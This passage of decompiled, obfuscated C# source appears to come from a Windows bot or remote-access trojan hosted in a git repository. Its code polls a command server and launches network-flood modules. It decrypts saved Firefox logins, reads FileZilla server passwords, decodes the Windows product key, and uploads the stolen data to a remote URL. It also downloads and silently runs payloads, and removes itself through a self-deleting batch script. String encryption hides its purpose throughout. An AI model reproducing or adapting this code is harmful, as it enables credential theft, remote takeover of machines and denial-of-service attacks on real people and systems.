}.Start();
new Process()
{
StartInfo = {
FileName = (Environment.GetEnvironmentVariable(\u003F195\u003F.\u003F196\u003F("Pņɏ͑")) + \u003F195\u003F.\u003F196\u003F("]") + \u003F1\u003F.\u003F1\u003F.\u003F156\u003F)
}
}.Start();
}
}
catch
{
}
Environment.Exit(0);
}
string str1 = \u003F1\u003F.\u003F1\u003F.\u003F157\u003F[0];
while (true)
{
try
{
string str2 = \u003F195\u003F.\u003F196\u003F("wťɫͥѮէؼ") + \u003F1\u003F.\u003F1\u003F.\u003F175\u003F + \u003F195\u003F.\u003F196\u003F(".ťɩͱѲզٰܼ") + \u003F1\u003F.\u003F1\u003F.\u003F158\u003F + \u003F195\u003F.\u003F196\u003F("/ūɨͳѫհٱݻ࠼") + \u003F1\u003F.\u003F1\u003F.\u003F160\u003F + \u003F195\u003F.\u003F196\u003F(".ŰɯͫѲզٰܼ") + \u003F1\u003F.\u003F1\u003F.\u003F179\u003F + \u003F195\u003F.\u003F196\u003F(" ŭɳͪѦԼ") + \u003F1\u003F.\u003F1\u003F.\u003F171\u003F;
string str3 = \u003F1\u003F.\u003F1\u003F.\u003F36\u003F(str1, str2);
if (str3.Length != 0)
{
if (str3 != \u003F1\u003F.\u003F1\u003F.\u003F174\u003F)
{
\u003F1\u003F.\u003F1\u003F.\u003F41\u003F(str3);
\u003F1\u003F.\u003F1\u003F.\u003F174\u003F = str3;
}
}
else
{
try
{
\u003F2\u003F.\u003F21\u003F();
}
catch
{
}
try
{
\u003F18\u003F.\u003F78\u003F();
}
catch
{
}
try
{
\u003F14\u003F.\u003F48\u003F();
}
catch
{
}
try
{
\u003F5\u003F.\u003F25\u003F();
}
catch
{
}
\u003F1\u003F.\u003F1\u003F.\u003F174\u003F = string.Empty;
}
}
catch
{
str1 = \u003F1\u003F.\u003F1\u003F.\u003F157\u003F[1];
}
Thread.Sleep(Convert.ToInt32(\u003F1\u003F.\u003F1\u003F.\u003F159\u003F) * 60000);
}
}
public static long \u003F39\u003F(string _param0)
{
string str = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + \u003F195\u003F.\u003F196\u003F("MŝɠʹѤ\u0560٧ݫࠩॎ੮\u0B74ౠൢ\u0E6Cེၝ");
\u003F1\u003F.\u003F1\u003F.\u003F37\u003F(str + \u003F195\u003F.\u003F196\u003F("aŤɰͪѺճطܼࠪ१੮୭"));
\u003F1\u003F.\u003F1\u003F.\u003F37\u003F(str + \u003F195\u003F.\u003F196\u003F("gŻɷʹбԪ٧ݮ\u086D"));
\u003F1\u003F.\u003F1\u003F.\u003F37\u003F(str + \u003F195\u003F.\u003F196\u003F("xūɥ̱Ъէٮݭ"));
\u003F1\u003F.\u003F1\u003F.\u003F37\u003F(str + \u003F195\u003F.\u003F196\u003F("yŤɣ͵бԪ٧ݮ\u086D"));
\u003F1\u003F.\u003F1\u003F.\u003F37\u003F(str + \u003F195\u003F.\u003F196\u003F("xŹɼͼѮժضܪ\u0867८੭"));
\u003F1\u003F.\u003F1\u003F.\u003F37\u003F(str + \u003F195\u003F.\u003F196\u003F("xŻɥ͡ѳգضܪ\u0867८੭"));
\u003F1\u003F.\u003F1\u003F.\u003F37\u003F(str + \u003F195\u003F.\u003F196\u003F("bŸɹͼѼծ٪ܶࠪ१੮୭"));
\u003F1\u003F.\u003F1\u003F.\u003F37\u003F(str + \u003F195\u003F.\u003F196\u003F("\u007FŤɬͽѧլ٨ܶࠪ१੮୭"));
\u003F1\u003F.\u003F1\u003F.\u003F173\u003F = \u003F1\u003F.\u003F1\u003F.\u003F37\u003F(str + \u003F195\u003F.\u003F196\u003F("fŴɵ̶Ъէٮݭ"));
return ((\u003F1\u003F.\u003F1\u003F.\u003F7\u003F) Marshal.GetDelegateForFunctionPointer(\u003F1\u003F.\u003F1\u003F.\u003F33\u003F(\u003F1\u003F.\u003F1\u003F.\u003F173\u003F, \u003F195\u003F.\u003F196\u003F("FŔɕ͚эխ٫ݵ")), typeof (\u003F1\u003F.\u003F1\u003F.\u003F7\u003F)))(_param0);
}
public static int \u003F40\u003F(
IntPtr _param0,
IntPtr _param1,
StringBuilder _param2,
int _param3)
{
return ((\u003F1\u003F.\u003F1\u003F.\u003F10\u003F) Marshal.GetDelegateForFunctionPointer(\u003F1\u003F.\u003F1\u003F.\u003F33\u003F(\u003F1\u003F.\u003F1\u003F.\u003F173\u003F, \u003F195\u003F.\u003F196\u003F("Xņɇ͑ѳբٵܹ࠺॒ੈ୮౩\u0E6Cར၄ᅰቢ፥ᑧᕳ")), typeof (\u003F1\u003F.\u003F1\u003F.\u003F10\u003F)))(_param0, _param1, _param2, _param3);
}
private static void \u003F41\u003F(string _param0)
{
try
{
string[] strArray = _param0.Split('*');
if (_param0.StartsWith(\u003F195\u003F.\u003F196\u003F("{žɨͣѨլ٭ݥ")))
{
try
{
\u003F2\u003F.\u003F129\u003F = strArray[1];
\u003F2\u003F.\u003F132\u003F = Convert.ToInt32(strArray[2]);
\u003F2\u003F.\u003F134\u003F = Convert.ToInt32(strArray[3]);
\u003F2\u003F.\u003F80\u003F = Convert.ToInt32(strArray[4]);
\u003F2\u003F.\u003F20\u003F();
}
catch
{
}
}
if (_param0.StartsWith(\u003F195\u003F.\u003F196\u003F("ażɳͶѣը٬ݭ\u0865")))
{
try
{
\u003F18\u003F.\u003F129\u003F = strArray[1];
\u003F18\u003F.\u003F134\u003F = Convert.ToInt32(strArray[2]);
\u003F18\u003F.\u003F77\u003F();
}
catch
{
}
}
if (_param0.StartsWith(\u003F195\u003F.\u003F196\u003F("}ţɶͣѨլ٭ݥ")))
{
try
{
\u003F14\u003F.\u003F129\u003F = strArray[1];
\u003F14\u003F.\u003F132\u003F = Convert.ToInt32(strArray[2]);
\u003F14\u003F.\u003F134\u003F = Convert.ToInt32(strArray[3]);
\u003F14\u003F.\u003F183\u003F = Convert.ToInt32(strArray[4]);
\u003F14\u003F.\u003F87\u003F = Convert.ToInt32(strArray[5]);
\u003F14\u003F.\u003F47\u003F();
}
catch
{
}
}
if (_param0.StartsWith(\u003F195\u003F.\u003F196\u003F("`ūɪͶѣը٬ݭ\u0865")))
{
try
{
\u003F5\u003F.\u003F129\u003F = strArray[1];
\u003F5\u003F.\u003F132\u003F = Convert.ToInt32(strArray[2]);
\u003F5\u003F.\u003F134\u003F = Convert.ToInt32(strArray[3]);
\u003F5\u003F.\u003F140\u003F = Convert.ToInt32(strArray[4]);
\u003F5\u003F.\u003F87\u003F = Convert.ToInt32(strArray[5]);
\u003F5\u003F.\u003F24\u003F();
}
catch
{
}
}
if (_param0.StartsWith(\u003F195\u003F.\u003F196\u003F("vŰɦͣѭ")))
{
try
{
string str1 = string.Empty;
string str2 = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + \u003F195\u003F.\u003F196\u003F("MŝɠʹѤ\u0560٧ݫࠩॎ੮\u0B74ౠൢ\u0E6Cེၝ");
string[] directories = Directory.GetDirectories(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u003F195\u003F.\u003F196\u003F("EŕɸͬѼոٿݳࡍॖ\u0B7C౨൪\u0E64ིၕᅘት\u1369ᑣᕭᙯᝧᡲ"));
try
{
foreach (string path in directories)
{
foreach (string file in Directory.GetFiles(path))
{
if (Regex.IsMatch(file, \u003F195\u003F.\u003F196\u003F("}Ťɫͥѥէٻܩ\u0875ॴ੨୪\u0C76\u0D64")))
{
\u003F1\u003F.\u003F1\u003F.\u003F39\u003F(path);
\u003F1\u003F.\u003F1\u003F.\u003F177\u003F = file;
}
}
}
DataTable dataTable = new \u003F16\u003F(\u003F1\u003F.\u003F1\u003F.\u003F177\u003F).\u003F51\u003F(\u003F195\u003F.\u003F196\u003F("Jŝɛ͓іՀسܸ࠱ॖ\u0A5Dୁీബ\u0E66ཥၳᅗቫ\u1369ᑢᕭ\u1771ᠺ"));
\u003F1\u003F.\u003F1\u003F.\u003F13\u003F obj1 = new \u003F1\u003F.\u003F1\u003F.\u003F13\u003F();
\u003F1\u003F.\u003F1\u003F.\u003F13\u003F obj2 = new \u003F1\u003F.\u003F1\u003F.\u003F13\u003F();
\u003F1\u003F.\u003F1\u003F.\u003F42\u003F(\u003F1\u003F.\u003F1\u003F.\u003F43\u003F(), true, 0L);
foreach (DataRow row in (InternalDataCollectionBase) dataTable.Rows)
{
str1 = str1 + \u003F195\u003F.\u003F196\u003F("]Ŭɪʹѣլٰݦ࠸ड") + row[\u003F195\u003F.\u003F196\u003F("`ŨɵͱѪբٯݤ")] + \u003F195\u003F.\u003F196\u003F("\v");
StringBuilder stringBuilder1 = new StringBuilder(row[\u003F195\u003F.\u003F196\u003F("tžɬͼѴռٿݯ\u086Dढ़ੴୣ\u0C77൪\u0E62\u0F6Fၤ")].ToString());
\u003F1\u003F.\u003F1\u003F.\u003F13\u003F structure1 = (\u003F1\u003F.\u003F1\u003F.\u003F13\u003F) Marshal.PtrToStructure(new IntPtr(\u003F1\u003F.\u003F1\u003F.\u003F40\u003F(IntPtr.Zero, IntPtr.Zero, stringBuilder1, stringBuilder1.Length)), typeof (\u003F1\u003F.\u003F1\u003F.\u003F13\u003F));
if (\u003F1\u003F.\u003F1\u003F.\u003F44\u003F(ref structure1, ref obj1, 0) == 0 && obj1.\u003F182\u003F != 0)
{
byte[] numArray = new byte[obj1.\u003F182\u003F];
Marshal.Copy(new IntPtr(obj1.\u003F181\u003F), numArray, 0, obj1.\u003F182\u003F);
str1 = str1 + \u003F195\u003F.\u003F196\u003F("LŨɢ;Ѿճ٭ݵ\u0868।੩సഡ") + Encoding.ASCII.GetString(numArray) + \u003F195\u003F.\u003F196\u003F("\v");
}
StringBuilder stringBuilder2 = new StringBuilder(row[\u003F195\u003F.\u003F196\u003F("tžɬͼѴռٿݯ\u086Dक़\u0B75\u0C76\u0D73\u0E6C\u0F70ၥ")].ToString());
\u003F1\u003F.\u003F1\u003F.\u003F13\u003F structure2 = (\u003F1\u003F.\u003F1\u003F.\u003F13\u003F) Marshal.PtrToStructure(new IntPtr(\u003F1\u003F.\u003F1\u003F.\u003F40\u003F(IntPtr.Zero, IntPtr.Zero, stringBuilder2, stringBuilder2.Length)), typeof (\u003F1\u003F.\u003F1\u003F.\u003F13\u003F));
if (\u003F1\u003F.\u003F1\u003F.\u003F44\u003F(ref structure2, ref obj2, 0) == 0 && obj2.\u003F182\u003F != 0)
{
byte[] numArray = new byte[obj2.\u003F182\u003F];
Marshal.Copy(new IntPtr(obj2.\u003F181\u003F), numArray, 0, obj2.\u003F182\u003F);
str1 = str1 + \u003F195\u003F.\u003F196\u003F("ZŨɻʹѱժٶݷ࠸ड") + Encoding.ASCII.GetString(numArray) + \u003F195\u003F.\u003F196\u003F("\v");
}
str1 += \u003F195\u003F.\u003F196\u003F("\v");
}
}
catch
{
}
if (str1 != string.Empty)
\u003F1\u003F.\u003F1\u003F.\u003F178\u003F = \u003F1\u003F.\u003F1\u003F.\u003F178\u003F + \u003F195\u003F.\u003F196\u003F("¢ƭʬίҮ֩ڨޫࢪॕ\u0A54ୗౖ\u0D51ནၒᅝቜ፟ᑞᕙᙘ\u175Bᡚ᥅ᩄᭇ᱆ᵁṀὃ⁂⅍≌⍏\u244E╉♈❋⡊⥵⩴⭷ⱖ\u2D71\u2E70⽳ひㅽ㉼㍿㑾㕹㙸㝻㡺㥯㨈㬤㰾㴮㸬㼦䀰䅧䈖䌤䐷䔰䘵䜮䠲䥛䩍䬝䰖䴑丐伓倒儝刜匟吞唙嘘圛堚夥娄嬇将崁帀弃怂愍戌挏搎攉昈朋栊椵樴欷氶洱渰漳瀲焽爼猿琾甹瘸眻砺礥稤笧簦紡縠缣耢脭般茯萮蔩蘈蜋") + str1;
string str3 = string.Empty;
string str4 = string.Empty;
try
{
XmlDocument xmlDocument = new XmlDocument();
xmlDocument.Load(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u003F195\u003F.\u003F196\u003F("FşɱͻѳՏٽݿ\u087E॰ੌ\u0B7C౧൹\u0E69སၫᅧቩ፠ᑣᕷᘪ\u177Bᡯᥭ"));
foreach (XmlNode selectNode in xmlDocument.DocumentElement.SelectNodes(\u003F195\u003F.\u003F196\u003F("]Ũɾͽѯջٻܨࡕॠ\u0A76\u0B75౧\u0D73")))
{
string str5 = selectNode.SelectSingleNode(\u003F195\u003F.\u003F196\u003F("LŬɱ͵")).FirstChild.Value;
string str6 = selectNode.SelectSingleNode(\u003F195\u003F.\u003F196\u003F("QŰɧͳ")).FirstChild.Value;
string str7 = selectNode.SelectSingleNode(\u003F195\u003F.\u003F196\u003F("TŢɱͲ")).FirstChild.Value;
string str8 = selectNode.SelectSingleNode(\u003F195\u003F.\u003F196\u003F("TŬɰ͵")).FirstChild.Value;
str3 = str3 + \u003F195\u003F.\u003F196\u003F("[Ţɴͳѡձظܡ") + str5 + \u003F195\u003F.\u003F196\u003F("\u0005Ōɨ͢Ѿվٳݭ\u0875२\u0A64୩സม") + str6 + \u003F195\u003F.\u003F196\u003F("\u0001ŚɨͻѴձ٪ݶ\u0877सਡ") + str7 + \u003F195\u003F.\u003F196\u003F("\rŖɪͶѷԸء") + str8 + \u003F195\u003F.\u003F196\u003F("\bċ");
}
}
catch
{
}
try
{
XmlDocument xmlDocument = new XmlDocument();
xmlDocument.Load(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u003F195\u003F.\u003F196\u003F("@ŝɳ͵ѽՍٿݹ\u0878ॲ\u0A4Eୣ\u0C75൬\u0E6Bལၸᅸቯ\u137Bᑾᕢᙴ\u1776ᠪ\u197Bᩯ᭭"));
foreach (XmlNode selectNode in xmlDocument.DocumentElement.SelectNodes(\u003F195\u003F.\u003F196\u003F("FŶɱʹѾջٝݨ\u087E੯\u0B7B\u0C7Bന๕འၶᅵቧ\u1373")))
{
string str9 = selectNode.SelectSingleNode(\u003F195\u003F.\u003F196\u003F("LŬɱ͵")).FirstChild.Value;
string str10 = selectNode.SelectSingleNode(\u003F195\u003F.\u003F196\u003F("QŰɧͳ")).FirstChild.Value;
string str11 = selectNode.SelectSingleNode(\u003F195\u003F.\u003F196\u003F("TŢɱͲ")).FirstChild.Value;
string str12 = selectNode.SelectSingleNode(\u003F195\u003F.\u003F196\u003F("TŬɰ͵")).FirstChild.Value;
str4 = str4 + \u003F195\u003F.\u003F196\u003F("[Ţɴͳѡձظܡ") + str9 + \u003F195\u003F.\u003F196\u003F("\u0005Ōɨ͢Ѿվٳݭ\u0875२\u0A64୩സม") + str10 + \u003F195\u003F.\u003F196\u003F("\u0001ŚɨͻѴձ٪ݶ\u0877सਡ") + str11 + \u003F195\u003F.\u003F196\u003F("\rŖɪͶѷԸء") + str12 + \u003F195\u003F.\u003F196\u003F("\bċ");
}
}
catch
{
}
if (str3 != string.Empty | str4 != string.Empty)
\u003F1\u003F.\u003F1\u003F.\u003F178\u003F = \u003F1\u003F.\u003F1\u003F.\u003F178\u003F + \u003F195\u003F.\u003F196\u003F("¢ƭʬίҮ֩ڨޫࢪॕ\u0A54ୗౖ\u0D51ནၒᅝቜ፟ᑞᕙᙘ\u175Bᡚ᥅ᩄᭇ᱆ᵁṀὃ⁂⅍≌⍏\u244E╉♈❋⡊⥵⩴⭷ⱖ\u2D71\u2E70⽳ひㅽ㉼㍿㑾㕹㙸㝻㡺㥯㨈㬤㰠㴮㸐㼠䀤䄫䈧䍥䐔䔢䘱䜲䠷䥐䩌䭙䱏䴛丐伓倒儝刜匟吞唙嘘圛堚夥娄嬇将崁帀弃怂愍戌挏搎攉昈朋栊椵樴欷氶洱渰漳瀲焽爼猿琾甹瘸眻砺礥稤笧簦紡縠缣耢脭般茯萮蔩蘈蜋") + str3 + str4;
string empty = string.Empty;
string str13 = string.Empty;
try
{
RegistryKey registryKey1 = Registry.LocalMachine.OpenSubKey(\u003F195\u003F.\u003F196\u003F("|Łɋ͘ќՋٛݍ\u087Bॺ੨୍ీ\u0D50๎ནၰᅸቩፀᑇᕍᙰ\u1776ᡳ\u1979ᩢ᭧ᰳᵜṅὌ⅍≸⍾\u2479╯♧\u277C⡑⥣⩷⭷ⱪ\u2D6D\u2E6F"));
if (registryKey1 != null)
empty = (string) registryKey1.GetValue(\u003F195\u003F.\u003F196\u003F("[ŸɦͬѲեٱ݊\u0862९\u0A64"));
RegistryKey registryKey2 = Registry.LocalMachine.OpenSubKey(\u003F195\u003F.\u003F196\u003F("|Łɋ͘ќՋٛݍ\u087Bॺ੨୍ీ\u0D50๎ནၰᅸቩፀᑇᕍᙰ\u1776ᡳ\u1979ᩢ᭧ᰳᵜṅὌ⅍≸⍾\u2479╯♧\u277C⡑⥣⩷⭷ⱪ\u2D6D\u2E6F"));
if (registryKey2 != null)
str13 = \u003F1\u003F.\u003F1\u003F.\u003F12\u003F.\u003F46\u003F((byte[]) registryKey2.GetValue(\u003F195\u003F.\u003F196\u003F("TŦɩͤѸժ٦ݙ\u087A२\u0A62୰౧\u0D77๋ཥ"), (object) RegistryValueKind.DWord));
}
catch
{
}
if (empty != string.Empty | str13 != string.Empty)
\u003F1\u003F.\u003F1\u003F.\u003F178\u003F = \u003F1\u003F.\u003F1\u003F.\u003F178\u003F + \u003F195\u003F.\u003F196\u003F("¢ƭʬίҮ֩ڨޫࢪॕ\u0A54ୗౖ\u0D51ནၒᅝቜ፟ᑞᕙᙘ\u175Bᡚ᥅ᩄᭇ᱆ᵁṀὃ⁂⅍≌⍏\u244E╉♈❋⡊⥵⩴⭷ⱖ\u2D71\u2E70⽳ひㅽ㉼㍿㑾㕹㙸㝻㡺㥯㨙㬤㰢㴯㸥㼾䀻䅧䈅䌁䑩䔈䘧䜸䡠䤕䨔䬗䰖䴑丐伓倒儝刜匟吞唙嘘圛堚夥娄嬇将崁帀弃怂愍戌挏搎攉昈朋栊椵樴欷氶洱渰漳瀲焽爼猿琾甹瘸眻砺礥稤笧簦紡縠缣耢脭般茯萮蔩蘈蜋") + empty + \u003F195\u003F.\u003F196\u003F("8ġ") + str13 + \u003F195\u003F.\u003F196\u003F("\v");
try
{
StreamWriter streamWriter = new StreamWriter(Environment.GetEnvironmentVariable(\u003F195\u003F.\u003F196\u003F("Pņɏ͑")) + \u003F195\u003F.\u003F196\u003F("]") + Environment.MachineName + \u003F195\u003F.\u003F196\u003F("*ůɭͦ"));
streamWriter.Write(\u003F1\u003F.\u003F1\u003F.\u003F178\u003F);
streamWriter.Close();
}
catch
{
}
try
{
ServicePointManager.Expect100Continue = false;
new WebClient().UploadFile(strArray[1], \u003F195\u003F.\u003F196\u003F("TŌɑ͕"), Environment.GetEnvironmentVariable(\u003F195\u003F.\u003F196\u003F("Pņɏ͑")) + \u003F195\u003F.\u003F196\u003F("]") + Environment.MachineName + \u003F195\u003F.\u003F196\u003F("*ůɭͦ"));
}
catch
{
}
try
{
System.IO.File.Delete(Environment.GetEnvironmentVariable(\u003F195\u003F.\u003F196\u003F("Pņɏ͑")) + \u003F195\u003F.\u003F196\u003F("]") + Environment.MachineName + \u003F195\u003F.\u003F196\u003F("*ůɭͦ"));
}
catch
{
}
}
catch
{
}
}
if (_param0.StartsWith(\u003F195\u003F.\u003F196\u003F("nŦɿͩѧի٠ݦ\u087A।")))
{
try
{
string str = \u003F1\u003F.\u003F1\u003F.\u003F176\u003F.NextString(12) + \u003F195\u003F.\u003F196\u003F("*Ŧɺͤ");
new WebClient().DownloadFile(strArray[1], Environment.GetEnvironmentVariable(\u003F195\u003F.\u003F196\u003F("Pņɏ͑")) + \u003F195\u003F.\u003F196\u003F("]") + str);
new Process()
{
StartInfo = {
FileName = (Environment.GetEnvironmentVariable(\u003F195\u003F.\u003F196\u003F("Pņɏ͑")) + \u003F195\u003F.\u003F196\u003F("]") + str),
WindowStyle = ProcessWindowStyle.Hidden
}
}.Start();
}
catch
{
}
}
if (_param0.StartsWith(\u003F195\u003F.\u003F196\u003F("sŭɰͫѵ")))
{
try
{
Process process = new Process()
{
StartInfo = new ProcessStartInfo(strArray[1])
};
process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
process.Start();
}
catch
{
}
}
if (_param0.StartsWith(\u003F195\u003F.\u003F196\u003F("sŵɠ͢Ѷդ")))
{
try
{
string str = \u003F1\u003F.\u003F1\u003F.\u003F176\u003F.NextString(12) + \u003F195\u003F.\u003F196\u003F("*Ŧɺͤ");
new WebClient().DownloadFile(strArray[1], Environment.GetEnvironmentVariable(\u003F195\u003F.\u003F196\u003F("Pņɏ͑")) + \u003F195\u003F.\u003F196\u003F("]") + str);
new Process()
{
StartInfo = {
FileName = (Environment.GetEnvironmentVariable(\u003F195\u003F.\u003F196\u003F("Pņɏ͑")) + \u003F195\u003F.\u003F196\u003F("]") + str),
WindowStyle = ProcessWindowStyle.Hidden
}
}.Start();
}
catch
{
}
try
{
string str = \u003F195\u003F.\u003F196\u003F("6řɯ\u0379ѭզٲ\u070F\u0860੮ଡ") + (object) '"' + Environment.GetCommandLineArgs()[0] + (object) '"' + \u003F195\u003F.\u003F196\u003F("\0Šɮ̧ѣս٭ݰ\u0876ड") + (object) '"' + Path.GetFileName(Application.ExecutablePath) + (object) '"' + \u003F195\u003F.\u003F196\u003F(",Ŭɥͽѧԧٔݠ\u0874\u0A63\u0B75");
TextWriter textWriter = (TextWriter) new StreamWriter(Environment.GetEnvironmentVariable(\u003F195\u003F.\u003F196\u003F("Pņɏ͑")) + \u003F195\u003F.\u003F196\u003F("WŮɬͤѢղ٠ܪ\u0861ॣੵ"));
textWriter.WriteLine(str);
textWriter.Close();
new Process()
{
StartInfo = {
FileName = (Environment.GetEnvironmentVariable(\u003F195\u003F.\u003F196\u003F("Pņɏ͑")) + \u003F195\u003F.\u003F196\u003F("WŮɬͤѢղ٠ܪ\u0861ॣੵ")),
UseShellExecute = false,
CreateNoWindow = true
}
}.Start();
}
catch
{
}
Environment.Exit(0);
}
if (!(_param0.StartsWith(\u003F195\u003F.\u003F196\u003F("tŠɩͬѴդ")) & strArray[1] == Environment.MachineName | strArray[1] == \u003F195\u003F.\u003F196\u003F("BŎɍ")))
return;
try
{
if (\u003F1\u003F.\u003F1\u003F.\u003F167\u003F)
Registry.LocalMachine.OpenSubKey(\u003F195\u003F.\u003F196\u003F("~Ńɍ͞ўՉٕ݃\u0879३\u0A4Aୁ\u0C53\u0D4F\u0E6Cཱၻᅨቇፍᑰᕶᙳ\u1779ᡢᥧᩏ᭑ᱤᵢṽὫ\u2063ⅸ≝⍯\u247B╻♮⡫⥘⩑⭷Ɐ"), true).DeleteValue(\u003F195\u003F.\u003F196\u003F("NŻɩͥѤԪف\u074Cࠧू\u0A77୭\u0C75൧\u0E73"));
else
Registry.CurrentUser.OpenSubKey(\u003F195\u003F.\u003F196\u003F("~Ńɍ͞ўՉٕ݃\u0879३\u0A4Aୁ\u0C53\u0D4F\u0E6Cཱၻᅨቇፍᑰᕶᙳ\u1779ᡢᥧᩏ᭑ᱤᵢṽὫ\u2063ⅸ≝⍯\u247B╻♮⡫⥘⩑⭷Ɐ"), true).DeleteValue(\u003F195\u003F.\u003F196\u003F("NŻɩͥѤԪف\u074Cࠧू\u0A77୭\u0C75൧\u0E73"));
}
catch
{
}
try
{
string str = \u003F195\u003F.\u003F196\u003F("6řɯ\u0379ѭզٲ\u070F\u0860੮ଡ") + (object) '"' + Environment.GetCommandLineArgs()[0] + (object) '"' + \u003F195\u003F.\u003F196\u003F("\0Šɮ̧ѣս٭ݰ\u0876ड") + (object) '"' + Path.GetFileName(Application.ExecutablePath) + (object) '"' + \u003F195\u003F.\u003F196\u003F(",Ŭɥͽѧԧٔݠ\u0874\u0A63\u0B75");
TextWriter textWriter = (TextWriter) new StreamWriter(Environment.GetEnvironmentVariable(\u003F195\u003F.\u003F196\u003F("Pņɏ͑")) + \u003F195\u003F.\u003F196\u003F("WŮɬͤѢղ٠ܪ\u0861ॣੵ"));
textWriter.WriteLine(str);
textWriter.Close();
new Process()
{
StartInfo = {
FileName = (Environment.GetEnvironmentVariable(\u003F195\u003F.\u003F196\u003F("Pņɏ͑")) + \u003F195\u003F.\u003F196\u003F("WŮɬͤѢղ٠ܪ\u0861ॣੵ")),
UseShellExecute = false,
CreateNoWindow = true
}
}.Start();
}
catch
{
}
Environment.Exit(0);
}
catch
{
}
}
public static long \u003F42\u003F(long _param0, bool _param1, long _param2) => ((\u003F1\u003F.\u003F1\u003F.\u003F9\u003F) Marshal.GetDelegateForFunctionPointer(\u003F1\u003F.\u003F1\u003F.\u003F33\u003F(\u003F1\u003F.\u003F1\u003F.\u003F173\u003F, \u003F195\u003F.\u003F196\u003F("AśȾ̿ђՍپݾ\u0861७੩\u0B72౬൧\u0E62ྲྀၤ")), typeof (\u003F1\u003F.\u003F1\u003F.\u003F9\u003F)))(_param0, _param1, _param2);
public static long \u003F43\u003F() => ((\u003F1\u003F.\u003F1\u003F.\u003F8\u003F) Marshal.GetDelegateForFunctionPointer(\u003F1\u003F.\u003F1\u003F.\u003F33\u003F(\u003F1\u003F.\u003F1\u003F.\u003F173\u003F, \u003F195\u003F.\u003F196\u003F("GŝȤ̥ьՕٴݤࡆॠ\u0A79୩\u0C79\u0D64\u0E68ཤ၌ᅣቼፗᕭᙵ")), typeof (\u003F1\u003F.\u003F1\u003F.\u003F8\u003F)))();
public static int \u003F44\u003F(
ref \u003F1\u003F.\u003F1\u003F.\u003F13\u003F _param0,
ref \u003F1\u003F.\u003F1\u003F.\u003F13\u003F _param1,
int _param2)
{
return ((\u003F1\u003F.\u003F1\u003F.\u003F11\u003F) Marshal.GetDelegateForFunctionPointer(\u003F1\u003F.\u003F1\u003F.\u003F33\u003F(\u003F1\u003F.\u003F1\u003F.\u003F173\u003F, \u003F195\u003F.\u003F196\u003F("_Ņȼ̽јՎٛݗࡃॣ\u0B76\u0C7A\u0D72\u0E75")), typeof (\u003F1\u003F.\u003F1\u003F.\u003F11\u003F)))(ref _param0, ref _param1, _param2);
}
public static void \u003F45\u003F()
{
int num = (int) MessageBox.Show(\u003F1\u003F.\u003F1\u003F.\u003F169\u003F, \u003F1\u003F.\u003F1\u003F.\u003F170\u003F, MessageBoxButtons.OK, MessageBoxIcon.Hand);
}
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
public delegate long \u003F7\u003F(string _param1);
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
public delegate long \u003F8\u003F();
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
public delegate long \u003F9\u003F(long _param1, bool _param2, long _param3);
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
public delegate int \u003F10\u003F(
IntPtr _param1,
IntPtr _param2,
StringBuilder _param3,
int _param4);
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
public delegate int \u003F11\u003F(
ref \u003F1\u003F.\u003F1\u003F.\u003F13\u003F _param1,
ref \u003F1\u003F.\u003F1\u003F.\u003F13\u003F _param2,
int _param3);
public class \u003F12\u003F
{
public static string \u003F46\u003F(byte[] _param0)
{
char[] chArray1 = new char[24]
{
'B',
'C',
'D',
'F',
'G',
'H',
'J',
'K',
'M',
'P',
'Q',
'R',
'T',
'V',
'W',
'X',
'Y',
'2',
'3',
'4',
'6',
'7',
'8',
'9'
};
char[] chArray2 = new char[29];
ArrayList arrayList = new ArrayList();
for (int index = 52; index <= 67; ++index)
arrayList.Add((object) _param0[index]);
for (int index1 = 28; index1 >= 0; --index1)
{
if ((index1 + 1) % 6 != 0)
{
int index2 = 0;
for (int index3 = 14; index3 >= 0; --index3)
{
int num = index2 << 8 | (int) (byte) arrayList[index3];
arrayList[index3] = (object) (byte) (num / 24);
index2 = num % 24;
chArray2[index1] = chArray1[index2];
}
continue;
}
chArray2[index1] = '-';
}
return new string(chArray2);
}
}
public struct \u003F13\u003F
{
public int \u003F180\u003F;
public int \u003F181\u003F;
public int \u003F182\u003F;
}
}
}
Reference in New Issue View Git Blame Copy Permalink